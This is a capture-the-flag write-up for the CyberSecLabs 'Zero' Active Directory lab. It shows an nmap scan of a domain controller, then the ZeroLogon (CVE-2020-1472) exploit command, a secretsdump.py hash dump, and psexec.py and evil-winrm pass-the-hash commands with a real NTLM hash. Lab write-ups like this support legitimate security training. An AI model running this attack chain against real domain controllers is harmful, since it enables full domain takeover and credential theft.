Cyber seclab - Zero (Windows)

Active Directory Practice

https://www.cyberseclabs.co.uk/labs/info/Zerowww.cyberseclabs.co.uk

Nmap Scan Result

Nmap scan report for 172.31.1.29
Host is up (0.044s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-18 22:38:46Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: Zero.csl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: Zero.csl0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Zero-DC.Zero.csl
| Not valid before: 2022-01-17T22:36:34
|_Not valid after:  2022-07-19T22:36:34
| rdp-ntlm-info: 
|   Target_Name: ZERO
|   NetBIOS_Domain_Name: ZERO
|   NetBIOS_Computer_Name: ZERO-DC
|   DNS_Domain_Name: Zero.csl
|   DNS_Computer_Name: Zero-DC.Zero.csl
|   Product_Version: 10.0.17763
|_  System_Time: 2022-01-18T22:38:49+00:00
|_ssl-date: 2022-01-18T22:39:32+00:00; 0s from scanner time.
Service Info: Host: ZERO-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: ZERO-DC, NetBIOS user: <unknown>, NetBIOS MAC: 0a:c6:ce:4b:0d:48 (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-01-18T22:38:49
|_  start_date: N/A

139 and 445 open - we can perform enum4linux -a to find domains.

Domain Name: ZERO Domain Sid: S-1-5-21-3994543222-2496524451-3410345432

The exploit for this box, dubbed “ZeroLogon”, allows us to instantly take over a Domain Controller by changing the machine password to an empty string.

latest impacket tool and the python script found here is needed.

Exploitation Steps:

Download the python script and chmod +x it.
Execute the script: python3 cve-2020-1472.py Zero-DC 172.31.1.29

This will change the account password to an empty string, which will let us bypass the authentication to get the administrator hashes.

3. Dump the admin hashes without proving password

secretsdump.py -no-pass -just-dc zero/'Zero-DC$'@172.31.1.29

4. After obtaining the admin hashes, use the "psexec.py" to get the root shell:

psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:36242e2cb0b26d16fafd267f39ccf990 Administrator@172.31.1.29

Option 2:

I was also able to get into the shell with evil-winRM.

./evil-winrm/evil-winrm.rb -i 172.31.1.29 -u Administrator -H 36242e2cb0b26d16fafd267f39ccf990

psexec.py takes two parts of the hashes whereas the evil-winrm takes the last part of the hash.

This room assumed that we knew about the Zero-login vulnerability.

PreviousCyberseclab - shares #1 Write-up

Last updated 2 years ago